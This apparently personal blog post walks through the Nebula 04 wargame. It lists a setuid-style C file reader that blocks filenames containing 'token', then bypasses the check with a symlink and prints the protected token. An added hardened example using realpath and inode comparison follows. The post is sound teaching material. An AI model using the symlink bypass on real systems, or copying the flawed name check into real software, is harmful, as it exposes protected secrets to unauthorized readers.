MattAndreko.com

Exploit Exercises - Nebula 04

I really like Nebula 04, because it is really easy, but still a commonly missed thing in programming.

The object of this challenge is to find a vulnerability and exploit this C++ program.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>        /* declares err(); the original listing compiles without it only with an implicit-declaration warning */

int main(int argc, char **argv, char **envp)
{
    char buf[1024];
    int fd, rc;

    /* Require exactly one argument: the file to read. */
    if(argc == 1) {
        printf("%s [file to read]\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    /* Blacklist check on the argument string only: rejects any name containing "token". */
    if(strstr(argv[1], "token") != NULL) {
        printf("You may not access '%s'\n", argv[1]);
        exit(EXIT_FAILURE);
    }

    /* open() follows symlinks, so the file actually opened need not carry the checked name. */
    fd = open(argv[1], O_RDONLY);
    if(fd == -1) {
        err(EXIT_FAILURE, "Unable to open %s", argv[1]);
    }

    rc = read(fd, buf, sizeof(buf));

    if(rc == -1) {
        err(EXIT_FAILURE, "Unable to read fd %d", fd);
    }

    write(1, buf, rc);
}

So this program first verifies that you passed it an argument of some sort. If you pass that check, it then makes sure that your argument does not contain the term “token”, since the developer knows the filename they want to protect. If both of those succeed, it tries to open the file and print it to the screen, as long as the file exists and there are no general read errors.

So to exploit this program, we need to pass it an argument that does not contain the term “token”. The check is applied only to the string we type, not to the file that actually gets opened, so all we need to do is make a symbolic link.

level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04
level04@nebula:/home/flag04$ ./flag04 /tmp/level04
06508b5e-8909-4f38-b630-fdb148a848a2
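As an added example (not from the original post or the Nebula source), here is the flag04 name check beside two defensive alternatives: resolving the path before testing it, and identifying the opened file by device and inode so that no name is trusted at all. The temporary directory, file names and helper names are constructed for the demo.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The original check: looks only at the string the caller typed. */
int name_is_blocked(const char *arg) {
    return strstr(arg, "token") != NULL;
}

/* Hardened check: resolve the path first (follows symlinks, squashes ..). */
int resolved_is_blocked(const char *arg) {
    char real[PATH_MAX];
    if (realpath(arg, real) == NULL)
        return 1;  /* fail closed when the path cannot be resolved */
    return strstr(real, "token") != NULL;
}

/* Stronger: decide on the opened file, not on a name. Same device and inode as
   the protected file means it is that file, whatever it was called or renamed. */
int fd_is_protected(int fd, const char *protected_path) {
    struct stat a, b;
    if (fstat(fd, &a) != 0 || stat(protected_path, &b) != 0)
        return 1;
    return a.st_dev == b.st_dev && a.st_ino == b.st_ino;
}

/* Constructed scenario mirroring the writeup: a "token" file and a symlink to
   it with an innocent name. Returns 1 when the name check misses the link
   but both hardened checks catch it. */
int demo_symlink_bypass(void) {
    char dir[] = "/tmp/nebula04XXXXXX", token[PATH_MAX], alias[PATH_MAX];
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(token, sizeof token, "%s/token", dir);
    snprintf(alias, sizeof alias, "%s/innocent", dir);
    int fd = open(token, O_WRONLY | O_CREAT, 0600);
    if (fd >= 0) close(fd);
    if (fd < 0 || symlink(token, alias) != 0) return 0;
    int by_name = name_is_blocked(alias);
    int by_path = resolved_is_blocked(alias);
    int rfd = open(alias, O_RDONLY);
    int by_fd = rfd >= 0 && fd_is_protected(rfd, token);
    if (rfd >= 0) close(rfd);
    unlink(alias); unlink(token); rmdir(dir);
    return !by_name && by_path && by_fd;
}
```

The realpath variant still has a window between the check and the open; the fstat variant checks the descriptor you are about to read from, so it has none.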

The only odd part about this challenge is that there’s apparently no privilege escalation done, so you can run “getflag”, like every other problem up until now. Someone else noticed the same thing, but there has been no answer. So as far as I’m concerned, this challenge is complete. We got the contents of the token file.
